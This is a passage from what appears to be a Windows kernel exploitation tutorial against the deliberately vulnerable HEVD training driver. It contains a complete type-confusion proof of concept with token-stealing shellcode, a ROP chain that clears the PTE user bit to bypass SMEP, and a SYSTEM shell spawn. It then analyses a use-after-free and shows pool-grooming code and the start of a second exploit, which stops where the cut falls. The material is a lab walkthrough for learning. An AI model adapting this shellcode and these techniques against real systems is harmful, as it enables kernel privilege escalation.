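constexpr std::uint64_t pte_offset(std::uint64_t va) {
    return (va >> 9) & 0x7FFFFFFFF8ULL;
}

constexpr std::uint64_t kUserBit = 1ULL << 2;  // U/S flag in an x64 PTE

// The ROP chain adds 0xfffffffffffffffc (-4) to the PTE. When the U/S bit is
// set, subtracting 4 clears exactly that bit and leaves the others unchanged.
constexpr std::uint64_t add_minus_four(std::uint64_t pte) {
    return pte + 0xfffffffffffffffcULL;
}
```

For a hypothetical PTE whose low flags are 0x867, the addition yields 0x863: the U/S bit is cleared, so the page is treated as a supervisor page and SMEP no longer blocks execution. The offset from pte_offset is added to the PTE base that the chain reads from nt!MiGetPteAddress+0x13.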
It worked: exploiting the Type Confusion vulnerability gives a shell as SYSTEM.
Full POC:
#include <Windows.h>
#include <stdio.h>
#include "ioctl.h"
#include <psapi.h>

typedef struct _MY_USER_INPUT {
    void* ObjectID;
    void* ObjectType; // Callback
} MY_USER_INPUT, *PMY_USER_INPUT;

PVOID getbaseaddress()
{
    BOOL status;
    LPVOID* pImageBase;
    DWORD ImageSize;
    status = EnumDeviceDrivers(nullptr, 0, &ImageSize);
    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);
    LPVOID ntaddr = pImageBase[0];
    return ntaddr;
}

uintptr_t MiGetPte(LPVOID lpMemory)
{
    uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory);
    uintptr_t calc1 = addr >> 9;             // shr rcx, 9
    uintptr_t calc2 = calc1 & 0x7FFFFFFFF8;  // and rax, rcx
    return calc2;
}

int main()
{
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %d", GetLastError());
        return 1;
    }

    LPVOID nt_addr = getbaseaddress();
    printf("[+] Nt base address: %p\n", nt_addr);

    BYTE shellcode[256] = {
        0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
        0x48, 0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00,
        0x49, 0x89, 0xc0,
        0x4d, 0x8b, 0x80, 0x48, 0x04, 0x00, 0x00,
        0x49, 0x81, 0xe8, 0x48, 0x04, 0x00, 0x00,
        0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
        0x49, 0x83, 0xf9, 0x04,
        0x75, 0xe5,
        0x49, 0x8b, 0x88, 0xb8, 0x04, 0x00, 0x00,
        0x80, 0xe1, 0xf0,
        0x48, 0x89, 0x88, 0xb8, 0x04, 0x00, 0x00,
        0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
        0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00,
        0x66, 0xff, 0xc1,
        0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00,
        0x48, 0x8b, 0x90, 0x90, 0x00, 0x00, 0x00,
        0x48, 0x8b, 0x8a, 0x68, 0x01, 0x00, 0x00,
        0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
        0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00,
        0x48, 0x8b, 0xaa, 0x58, 0x01, 0x00, 0x00,
        0x31, 0xc0,
        0x0f, 0x01, 0xf8,
        0x48, 0x0f, 0x07,
        // 0xff padding up to the 256-byte array size
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
        0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
    };

    LPVOID lpMemory = VirtualAlloc(NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
    printf("[+] Shellcode address: %p\n", lpMemory);
    memcpy(lpMemory, shellcode, sizeof(shellcode));

    uintptr_t ShellcodePte = MiGetPte(lpMemory);
    printf("[+] PTE calculated shellcode address: %p\n", (void*)ShellcodePte);

    _MY_USER_INPUT input;
    input.ObjectID = (LPVOID)(0x4141414141414141);
    input.ObjectType = (LPVOID)((uintptr_t)nt_addr + 0x0059f24e); // mov esp, 0x83000000 ; ret

    uintptr_t STACK_PIVOT = 0x83000000;
    LPVOID fakeStack = VirtualAlloc((LPVOID)(STACK_PIVOT - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("[+] Allocated region: %p\n", fakeStack);
    if (!VirtualLock(fakeStack, 0x10000)) {
        printf("Error using VirtualLock: %d\n", GetLastError());
    }
    // memset takes (destination, value, size); the value and size were swapped before
    memset(fakeStack, '\x41', 0x10000);

    int index = 0;
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x002a19bc); // nop; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00202e71); // pop rcx; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)ShellcodePte; // Shellcode in user-mode
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201862); // pop rax; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // nt!MiGetPteAddress+0x13
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0027bcbf); // mov rax, qword ptr [rax]; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x0020e204); // add rax, rcx; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x00201861); // pop r8 ; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)(0xfffffffffffffffc); // -4
    *((LPVOID*)(STACK_PIVOT)+index++) = (LPVOID)((uintptr_t)nt_addr + 0x003fd49b); // add qword ptr [rax], r8 ; ret
    *((LPVOID*)(STACK_PIVOT)+index++) = lpMemory; // Shellcode in user-mode

    // getchar();
    printf("[+] Calling TYPE_CONFUSION_VULN....");
    BOOL success = DeviceIoControl( // DeviceIoControl returns BOOL, not NTSTATUS
        hDriver,
        TYPE_CONFUSION_VULN,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }

    printf("[+] Spawning a shell with elevated privileges\n\n");
    system("cmd");
    return 0;
}
Use-After-Free Vulnerability
A Use-After-Free (UAF) vulnerability occurs when a program continues to use a pointer to a memory region that has already been freed or deallocated. It typically arises when the reference to the freed memory is not set to NULL, allowing the program to inadvertently reuse the pointer. If the freed memory is reallocated for another purpose, reusing the old pointer can lead to undefined behavior and potentially arbitrary code execution. Such a stale pointer is also called a dangling pointer.
In HEVD, we will use multiple functions to perform the UAF attack:
- AllocateUaFObjectNonPagedPool (0x222013) - This function allocates 0x60 bytes of NonPagedPool with the tag “Hack” and stores the pointer to the region in a global variable.
- FreeUaFObjectNonPagedPool (0x22201B) - This function frees the allocated region through the global variable but forgets to set the global variable to NULL, which leaves it as a dangling pointer.
- UseUaFObjectNonPagedPool (0x222017) - This function reads the first 8 bytes (a pointer) of the region referenced by the global variable and calls it.
- AllocateFakeObjectNonPagedPool (0x22201F) - This function allocates 0x58 bytes of NonPagedPool and fills it with the user’s input, which we will use to exploit this vulnerability.
This is just a brief summary of the functions; each one is explained in more detail below.
IDA Analysis
AllocateUaFObjectNonPagedPool
Let’s begin with the first function, AllocateUaFObjectNonPagedPoolIoctlHandler, which calls AllocateUaFObjectNonPagedPool. This call does not take any arguments.
Diving into the AllocateUaFObjectNonPagedPool function, it calls the ExAllocatePoolWithTag() API, which takes 3 arguments:
- PoolType is the type of pool memory to allocate. xor ecx, ecx (1️⃣) sets the ECX register to zero, which means NonPagedPool (it cannot be paged out).
- NumberOfBytes (2️⃣), as the name suggests, is the number of bytes to allocate.
- Tag (3️⃣) is the pool tag for the allocated memory, given as ASCII characters in reverse order. Here it’s 0x6B636148: read byte by byte, the value spells “kcaH”, which is “Hack” in reverse. A tag is limited to 4 characters. The purpose of the tag is to help track down memory leaks: when a user-mode application crashes or is force closed, the kernel cleans up its memory, but nothing does this for kernel allocations.
After the call to ExAllocatePoolWithTag(), the return value (RAX), which is the pointer to the allocated region, is copied to the RDI register (4️⃣).
PVOID ExAllocatePoolWithTag(
    [in] __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
    [in] SIZE_T NumberOfBytes,
    [in] ULONG Tag
);
Following that, it calls memset (1️⃣), which also takes 3 arguments, to fill the allocated region with A’s. Then it stores the pointer to the allocated region from RDI in the global variable g_UseAfterFreeObjectNonPagedPool (2️⃣).
I made a POC that calls the AllocateUaFObjectNonPagedPool function, so let’s do some dynamic analysis:
- 1️⃣ is the call to the AllocateUaFObjectNonPagedPool function, 2️⃣ is the call to the ExAllocatePoolWithTag() API, and at 3️⃣ we can see all 3 arguments, where RDX, the size of the allocated region, is 0x60 bytes.
- Stepping over the call to ExAllocatePoolWithTag(), the return value RAX (4️⃣) holds the address of the newly allocated non-paged region. For now it contains leftover data.
Moving on to the call to memset() (1️⃣), it also takes 3 arguments. The destination in RCX is not the start of the region allocated by ExAllocatePoolWithTag() but <Allocated_Region> + 0x8 (2️⃣). Stepping over the call, we can see (3️⃣) that the region is filled with A’s. It skips the first 0x8 bytes and the last 0x4 bytes and fills the remaining 0x54 bytes with A’s. This suggests a structure where the first 8 bytes are used for something else and the next 0x54 bytes are a char array.
From IDA I couldn’t tell whether it’s a structure or not (maybe the symbols are broken), so I checked the source code: the return value of ExAllocatePoolWithTag() is cast to a pointer to the USE_AFTER_FREE_NON_PAGED_POOL structure. This structure has 2 members: the first is a pointer (8 bytes) and the second is a char array of 0x54 bytes, so what we saw above is correct. The untouched last 0x4 bytes are alignment padding that rounds the structure up to 0x60 bytes.
typedef struct _USE_AFTER_FREE_NON_PAGED_POOL
{
FunctionPointer Callback;
CHAR Buffer[0x54];
} USE_AFTER_FREE_NON_PAGED_POOL, *PUSE_AFTER_FREE_NON_PAGED_POOL;
WinDbg has an extension, !poolused, that displays pool usage summarized by tag, and you can also pass it a specific tag. With !poolfind <TAG> we can locate the allocations for a specific tag, but it takes a lot of time. We know that the ExAllocatePoolWithTag() call above uses “Hack” as its tag, and I was able to find it in the output:
1: kd> !poolused
unable to get nt!PspSessionIdBitmap
Using a machine size of ffe7f pages to configure the kd cache
*** CacheSize too low - increasing to 64 MB
Max cache size is : 67108864 bytes (0x10000 KB)
Total memory in cache : 10600 bytes (0xb KB)
Number of regions cached: 23
99 full reads broken into 110 partial reads
counts: 81 cached/29 uncached, 73.64% cached
bytes : 41949 cached/9120 uncached, 82.14% cached
** Transition PTEs are implicitly decoded
** Prototype PTEs are implicitly decoded
..
Sorting by Tag
NonPaged Paged
Tag Allocs Used Allocs Used
Hack 1 96 0 0 UNKNOWN pooltag 'Hack', please update pooltag.txt
[::]
FreeUaFObjectNonPagedPool
The second function is FreeUaFObjectNonPagedPoolIoctlHandler, which calls FreeUaFObjectNonPagedPool. It also does not take any arguments, so no user input is required for this call.
Inside the FreeUaFObjectNonPagedPool function:
- 1️⃣ checks whether the global variable g_UseAfterFreeObjectNonPagedPool is not NULL. Recall that AllocateUaFObjectNonPagedPool stored the pointer returned by ExAllocatePoolWithTag() in this global variable.
- Since we already made the call to AllocateUaFObjectNonPagedPool, it won’t take the jump.
- At 2️⃣ it calls ExFreePoolWithTag(), which deallocates a block of pool memory allocated with the specified tag. It takes 2 arguments: the pointer to the region (RCX, 3️⃣) and the tag “Hack” (EDX, 4️⃣).
void ExFreePoolWithTag(
    [in] PVOID P,
    [in] ULONG Tag
);
This is where the first issue arises: the call to ExFreePoolWithTag() deallocates the block, but the function never sets the g_UseAfterFreeObjectNonPagedPool global variable to NULL.
I started dynamic analysis on the FreeUaFObjectNonPagedPool function:
- 1️⃣ HEVD+0x83008 is the global variable that holds the address of the allocated region.
- 2️⃣ begins the ExFreePoolWithTag() call, which takes 2 arguments (3️⃣): the address of the allocated region and the tag (“Hack”).
- 4️⃣ We can also confirm that the region holds the A’s written by memset() in AllocateUaFObjectNonPagedPool.
- Stepping over the call and checking the region again (5️⃣), it has been freed.
- But the issue is that the global variable (g_UseAfterFreeObjectNonPagedPool) is not set to NULL, and we can see (6️⃣) that it still holds the pointer to the region.
UseUaFObjectNonPagedPool
Moving on to the next step, the UseUaFObjectNonPagedPoolIoctlHandler function calls UseUaFObjectNonPagedPool. Like the previous calls, it does not take any arguments.
Inside the UseUaFObjectNonPagedPool function:
- (1️⃣) It checks whether the global variable (g_UseAfterFreeObjectNonPagedPool) is NULL. If it is not NULL, it won’t take the jump, and (2️⃣) it copies the global variable into the RAX register.
- Then (3️⃣) it dereferences RAX into the RCX register, which copies the first 8 bytes of the allocated region into RCX. Finally, it calls RCX (4️⃣).
- This means that whatever is placed in the first 8 bytes of the region that g_UseAfterFreeObjectNonPagedPool points to will be called by the driver. Recall that it’s a USE_AFTER_FREE_NON_PAGED_POOL structure whose first member is a pointer (8 bytes), so the driver simply calls that pointer.
- This is the UAF vulnerability: the same pointer is reused after the free because it was never set to NULL.
Let’s test this dynamically by calling AllocateUaFObjectNonPagedPool first and then UseUaFObjectNonPagedPool. We don’t want to free the memory yet; we just want to know whether the first 8 bytes get called.
I placed a breakpoint on the call to UseUaFObjectNonPagedPool() (1️⃣) and another where it copies the global variable (g_UseAfterFreeObjectNonPagedPool) into the RAX register (2️⃣). We can also inspect the memory the global variable points to (3️⃣): it contains the A’s, and the first 8 bytes contain a pointer (4️⃣). Moving forward, it performs the dereference (5️⃣) and copies the first 8 bytes into the RCX register, which we can confirm by checking RCX (6️⃣), and finally it calls RCX (7️⃣).
Now that we have a basic understanding of how these functions work, the attack goes as follows. We allocate the memory using AllocateUaFObjectNonPagedPool and then free it using FreeUaFObjectNonPagedPool. The memory is now freed, but the global variable (g_UseAfterFreeObjectNonPagedPool) still holds the pointer to that address. So we need to somehow reclaim the freed memory and place our payload there, and finally call UseUaFObjectNonPagedPool, which will call the pointer stored in the first 8 bytes of the region the global variable points to.
AllocateFakeObjectNonPagedPool
To reclaim the freed memory we can use the AllocateFakeObjectNonPagedPoolIoctlHandler function, which takes a user argument (1️⃣) from the _IO_STACK_LOCATION structure. As explained in previous posts, _IO_STACK_LOCATION + 0x20 is DeviceIoControl→Type3InputBuffer, which is the user input. The handler then calls the AllocateFakeObjectNonPagedPool function.
The pointer to the user input (UserFakeObject) is stored in the RSI register:
Moving on, there is an ExAllocatePoolWithTag() call that takes 3 arguments, very similar to what we saw previously:
- PoolType is the type of pool memory to allocate. xor ecx, ecx (1️⃣) sets the ECX register to zero, which means NonPagedPool (it cannot be paged out).
- NumberOfBytes (2️⃣), as the name suggests, is the number of bytes to allocate.
- Tag (3️⃣) is the pool tag for the allocated memory, given as ASCII characters in reverse order. Here it’s 0x6B636148, which is “Hack” in reverse (“kcaH”).
- After the call, the return value in RAX (5️⃣) is stored in the RDI register.
Moving forward, it calls (1️⃣) ProbeForRead(), which checks that a user-mode buffer actually resides in user space and is correctly aligned. As we can see, it passes UserFakeObject (the user input == RSI) as the Address to check.
Then comes a whole lot of copying (2️⃣):
- It uses XMM registers here, which are 16-byte (0x10) registers.
- The MOVUPS instruction works like a normal MOV but moves 16 bytes to or from an XMM register, without requiring the memory operand to be aligned.
- Starting with the first MOVUPS instruction: we already know RSI holds the user input, so it copies the first 16 bytes of user input into the XMM0 register. Then it copies XMM0 to the address in RDI, the NonPagedPool block allocated in the previous step by ExAllocatePoolWithTag().
- Then it copies the next 16 bytes of user input into XMM1 and from XMM1 to RDI+0x10, and so on, copying the user input into the newly allocated region.
- The remaining instructions copy the rest of the user input. At the end it loads the QWORD (8 bytes) at RSI + 0x50 into XMM1 and stores it to RDI + 0x50 using the MOVSD instruction, which moves only the lower 8 bytes of the 16-byte XMM1 register.
- Finally it writes a null byte at the end of the buffer (3️⃣). In total it copies 88 bytes (0x58) of user input.
Let’s try this out. This time I only call the AllocateFakeObjectNonPagedPool function. Since the XMM copy sequence copies 0x58 bytes of user input, I sent 88 bytes (0x58) of A’s to see how it goes.
CHAR buffer[88];
memset(buffer, 'A', 88);
success = DeviceIoControl(
    hDriver,
    ALLOCATE_FAKE_NON_PAGED,
    buffer,
    sizeof(buffer),
    nullptr,
    0,
    nullptr,
    nullptr);
I placed a breakpoint on ExAllocatePoolWithTag() (1️⃣) and got the hit. Checking the parameters (2️⃣), we can see that the second argument (RDX = NumberOfBytes) is 0x58 bytes (88 bytes). So it allocates 0x58 bytes of NonPagedPool and copies the same amount of user input into this region.
Stepping over the call, RAX holds the address (3️⃣) of the allocated non-paged region, and that region currently contains leftover data (4️⃣, more on this later).
Moving on to the ProbeForRead() call (1️⃣), the RCX register (2️⃣) holds the user-space address that contains the buffer of A’s we sent (3️⃣).
Then we enter the copy operation. It copies the first 16 bytes of user input into the XMM0 register (1️⃣); if we check XMM0 (2️⃣), we can see it holds 16 bytes of A’s, which are then copied to the NonPagedPool region (3️⃣). We can confirm this by checking the memory at RDI, where the first 16 bytes are overwritten by our input (4️⃣).
Finally, it writes the null terminator (1️⃣) at the end of the buffer, which we can also confirm (2️⃣).
So the AllocateFakeObjectNonPagedPool function helps us allocate a NonPagedPool region of 0x58 bytes and copy a user input buffer into it. But how can we use this functionality to reclaim the freed memory?
Before that, we need to know a little bit about memory management.
As I explained earlier, VirtualAlloc() allocates memory in pages (4 KB), and allocating a whole page for a small chunk of memory (like 50 bytes) would be highly inefficient and wasteful. To address this, a heap manager hands out smaller blocks of the requested size instead of whole pages. In user mode this is called the heap. It is dynamically allocated memory, meaning it can grow (or shrink) when required. malloc is an example of a heap allocation API.
The kernel-space counterpart of the user-space heap is the kernel pool: dynamically allocated memory reserved for kernel land. There are two distinct types of pool memory, paged and non-paged:
- Paged Pool: This memory can be swapped to disk when not in use.
- Non-Paged Pool: This memory is guaranteed to reside in physical memory at all times.
In the Windows kernel, the main function for allocating pool memory is ExAllocatePoolWithTag(), and the one for freeing it is ExFreePoolWithTag().
Recall that ExAllocatePoolWithTag() has a parameter called PoolType, which is a POOL_TYPE enum. As you can see below, there are multiple pool types, but most of them are just variants of NonPagedPool or PagedPool. For example, NonPagedPoolNx is no-execute (NX) nonpaged pool.
Microsoft recommends no longer using ExAllocatePoolWithTag(): it has been deprecated in Windows 10, version 2004 and replaced by ExAllocatePool2.
When NonPagedPool memory is allocated, the memory manager decides which pool region the allocation goes into. A pool region is a larger contiguous section of memory that contains small chunks/blocks of allocated memory.
Once we allocate 0x60 bytes using the AllocateUaFObjectNonPagedPool function, we can inspect the address of the allocated region with the !pool command. As you can see, it reports the region as Nonpaged pool and lists a lot of other blocks in the region, including our allocated block.
As you might have noticed, the size of the “Hack” block is 0x70. This is because each pool chunk is prepended with a 0x10-byte _POOL_HEADER. It holds metadata for the chunk: for example, PoolTag is the tag, and ProcessBilled is a pointer to the EPROCESS structure of the process that made the allocation.
//0x10 bytes (sizeof)
struct _POOL_HEADER
{
    union
    {
        struct
        {
            USHORT PreviousSize:8;                  //0x0
            USHORT PoolIndex:8;                     //0x0
            USHORT BlockSize:8;                     //0x2
            USHORT PoolType:8;                      //0x2
        };
        ULONG Ulong1;                               //0x0
    };
    ULONG PoolTag;                                  //0x4
    union
    {
        struct _EPROCESS* ProcessBilled;            //0x8
        struct
        {
            USHORT AllocatorBackTraceIndex;         //0x8
            USHORT PoolTagHash;                     //0xa
        };
    };
};
When a memory region is dynamically allocated and then freed, it goes onto a “free list”. These free blocks still hold whatever data they contained while they were in use. When the kernel or a kernel driver requests pool memory (NonPagedPool), the request is served from the free list when possible. This reduces the overhead of frequent memory allocation and deallocation.
So if AllocateUaFObjectNonPagedPool allocates 0x60 bytes, we free them using FreeUaFObjectNonPagedPool, and we then allocate 0x58 bytes using AllocateFakeObjectNonPagedPool, the new allocation is served from the free list and we may or may not get the same block back.
Trying this out, we can see that the blocks land close to each other, so they at least come from the same pool region. But this is not enough to exploit the vulnerability.
Exploitation
To exploit this UAF vulnerability and reclaim the freed memory, we will use a technique called Kernel Feng Shui; the references at the end list articles about it. We are going to specifically follow this methodology:
Source: https://elhacker.info/manuales/Análisis de malware/BlackHat_DC_2011_Mandt_kernelpool-wp.pdf
With Kernel Feng Shui, also called kernel pool grooming, we allocate NonPaged blocks/chunks using kernel objects of the same size as the block we are trying to reclaim, which in our case is 0x60 bytes. So we need to find a kernel object of nearly the same size. There is excellent research by Alex Ionescu on this technique. Using the CreatePipe() and WriteFile() APIs it’s possible to create a “File” kernel object, adjust the size of its allocation, and have it allocated with the tag “NpFr”.
To try this out, I created the following script:
- To check how many bytes we can allocate, I started with 0x20 bytes of A’s.
- I also placed 2 getchar() calls, one before and one after the WriteFile() API. We need to determine the allocation size, because the named pipe prefixes our buffer with its own internal header, called DATA_ENTRY. It’s an undocumented structure, so we need to determine its size as well.
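#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>
#include <string.h>

int main() {
    HANDLE rPipe;
    HANDLE wPipe;
    DWORD outLength;
    CHAR buffer[0x20];
    memset(buffer, 'A', sizeof(buffer));

    // Create an anonymous pipe
    if (!CreatePipe(&rPipe, &wPipe, NULL, sizeof(buffer))) {
        printf("Error: CreatePipe failed: %lu\n", GetLastError());
        return 1;
    }
    printf("Read Handle : %p\n", rPipe);
    getchar(); // pause: inspect the NpFr tag before writing

    printf("Write Handle : %p\n", wPipe);
    // Writing to the pipe is what creates the DATA_ENTRY allocation
    if (!WriteFile(wPipe, buffer, sizeof(buffer), &outLength, NULL)) {
        printf("Error: WriteFile failed: %lu\n", GetLastError());
        return 1;
    }
    getchar(); // pause: inspect the NpFr tag after writing
    return 0;
}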
I ran the script and, after CreatePipe() executed, checked the NpFr tag: there are no live allocations yet (Diff is 0), because we haven’t written anything to the pipe.
0: kd> !poolused 1 NpFr
Using a machine size of ffe7f pages to configure the kd cache
..
Sorting by Tag
NonPaged Paged
Tag Allocs Frees Diff Used Allocs Frees Diff Used
NpFr 6315 6315 0 0 0 0 0 0 DATA_ENTRY records (read/write buffers) , Binary: npfs.sys
TOTAL 6315 6315 0 0 0 0 0 0
Stepping forward past the execution of WriteFile(), we can see that one allocation of 96 bytes (0x60) now exists. Since we wrote 0x20 bytes of A’s, DATA_ENTRY accounts for the other 0x40 bytes.
0: kd> !poolused 2 NpFr
Using a machine size of ffe7f pages to configure the kd cache
..
Sorting by NonPaged Pool Consumed
NonPaged Paged
Tag Allocs Used Allocs Used
NpFr 1 96 0 0 DATA_ENTRY records (read/write buffers) , Binary: npfs.sys
TOTAL 1 96 0 0
It might be confusing that the !poolused command shows sizes in decimal while the !pool command shows them in hexadecimal. To make sure, I also checked the Hack tag using !poolused, and it clearly reports decimal (112 bytes == 0x70 bytes).
Now that we can control the size of the pool allocation, we increase our buffer to 0x30 bytes so that the NonPaged pool allocation becomes 0x70 bytes. Recall that every block is prepended with a _POOL_HEADER structure (0x10 bytes), so we need to account for that too. Why are we doing this? We are trying to create allocations of the same size as the “Hack” block so that we can use the Kernel Feng Shui technique.
#include <stdio.h>
#include <Windows.h>
#include <stdlib.h>
#include <string.h>

int main() {
    HANDLE rPipe;
    HANDLE wPipe;
    DWORD outLength;
    CHAR buffer[0x30];
    memset(buffer, 'A', sizeof(buffer));

    if (!CreatePipe(&rPipe, &wPipe, NULL, sizeof(buffer))) {
        printf("Error: CreatePipe failed: %lu\n", GetLastError());
        return 1;
    }
    printf("Read Handle : %p\n", rPipe);
    printf("Write Handle : %p\n", wPipe);

    // A 0x30-byte write should now produce a 0x70-byte NpFr block
    if (!WriteFile(wPipe, buffer, sizeof(buffer), &outLength, NULL)) {
        printf("Error: WriteFile failed: %lu\n", GetLastError());
        return 1;
    }
    getchar(); // pause: inspect the NpFr tag
    return 0;
}
Now everything seems good:
This is what we are going to do:
- First we allocate a lot of DATA_ENTRY objects of 0x70 bytes using the CreatePipe() and WriteFile() APIs, by calling these APIs a fixed number of times. This step is called defragmentation: it fills the existing gaps in the pool so that subsequent allocations are placed together in contiguous sections.
- Next we allocate more DATA_ENTRY objects, expecting all of these objects to be stored sequentially.
- Then we free every second DATA_ENTRY object of the sequential allocations to create holes.
- After that we allocate the 0x60-byte Hack object using AllocateUaFObjectNonPagedPool and hope it lands in one of the holes we created. The address of this region is stored in the global variable (g_UseAfterFreeObjectNonPagedPool).
- We free that memory using FreeUaFObjectNonPagedPool, but the global variable (g_UseAfterFreeObjectNonPagedPool) is not set to NULL and still holds the pointer to the region (blue).
- Finally we allocate a lot of malicious objects using AllocateFakeObjectNonPagedPool to fill every hole, one of which is the block g_UseAfterFreeObjectNonPagedPool points to, and trigger execution using UseUaFObjectNonPagedPool.
To begin with, we need to call the CreatePipe() and WriteFile() APIs a fixed number of times. This for loop calls these APIs for HANDLE_COUNT iterations.
for (int i = 0; i < HANDLE_COUNT; i++) {
    if (!CreatePipe(&rPipes[i], &wPipes[i], NULL, sizeof(buffer))) {
        printf("Error: CreatePipe failed at iteration %d\n", i);
        break;
    }
    if (!WriteFile(wPipes[i], buffer, sizeof(buffer), &outLength, NULL)) {
        printf("Error: WriteFile failed at iteration %d\n", i);
        break;
    }
}
We can create the hole by closing every second handle:
for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
    if (i % 2 == 0) {
        CloseHandle(srPipes[i]);
        CloseHandle(swPipes[i]);
    }
}
We know that UseUaFObjectNonPagedPool calls a pointer read through g_UseAfterFreeObjectNonPagedPool. So, when creating the fake object using AllocateFakeObjectNonPagedPool, I filled it with B’s to see whether I can make the driver call that value. This also needs to be done a fixed number of times (ALLOC_HANDLE_COUNT) to fill every hole, one of which is the block g_UseAfterFreeObjectNonPagedPool points to.
printf("[+] Calling AllocateFakeObjectNonPagedPool....\n");
printf("[+] Filling the holes with fake objects..\n");
CHAR buffer[0x58];
memset(buffer, 'B', 0x58);
for (int i = 0; i < ALLOC_HANDLE_COUNT; i++) {
    success = DeviceIoControl(
        hDriver,
        ALLOCATE_FAKE_NON_PAGED,
        buffer,
        sizeof(buffer),
        nullptr,
        0,
        nullptr,
        nullptr);
}
I placed a breakpoint in the UseUaFObjectNonPagedPool function where it calls the pointer read through g_UseAfterFreeObjectNonPagedPool. On the first run RCX was not overwritten, but when I re-ran the code it worked and RCX was overwritten.
I used the same fake-stack pivot method that I explained for the type confusion vulnerability, so UseUaFObjectNonPagedPool calls our stack pivot gadget, pivots to user space, and then executes the rest of the ROP gadgets, which bypass SMEP & VBS (HVCI is disabled in this scenario) and spawn a SYSTEM shell.
The defragmentation and allocation process sometimes takes 1 or 2 attempts, but a failed attempt won’t crash the machine. An IRQL_NOT_LESS_OR_EQUAL crash can occur after the stack pivot executes, but as I explained earlier it doesn’t always happen, only when the IRQL is higher; otherwise we can still execute our shellcode in user space.
Final POC:
#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <psapi.h>

#define ALLOCATE_UAF_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x804, METHOD_NEITHER, FILE_ANY_ACCESS)
#define FREE_UAF_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x806, METHOD_NEITHER, FILE_ANY_ACCESS)
#define USE_UAF_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x805, METHOD_NEITHER, FILE_ANY_ACCESS)
#define ALLOCATE_FAKE_NON_PAGED CTL_CODE(FILE_DEVICE_UNKNOWN, 0x807, METHOD_NEITHER, FILE_ANY_ACCESS)
#define HANDLE_COUNT 20000
#define ALLOC_HANDLE_COUNT 80000
#define FAKE_ALLOC_COUNT (ALLOC_HANDLE_COUNT / 2)

// Grooms the NonPaged pool with 0x70-byte NpFr blocks and punches holes in them
int fengshui() {
    HANDLE* rPipes = (HANDLE*)malloc(HANDLE_COUNT * sizeof(HANDLE));
    HANDLE* wPipes = (HANDLE*)malloc(HANDLE_COUNT * sizeof(HANDLE));
    HANDLE* srPipes = (HANDLE*)malloc(ALLOC_HANDLE_COUNT * sizeof(HANDLE));
    HANDLE* swPipes = (HANDLE*)malloc(ALLOC_HANDLE_COUNT * sizeof(HANDLE));
    if (rPipes == NULL || wPipes == NULL || srPipes == NULL || swPipes == NULL) {
        printf("Error: Memory allocation failed\n");
        return 1;
    }

    CHAR buffer[0x30];
    DWORD outLength;
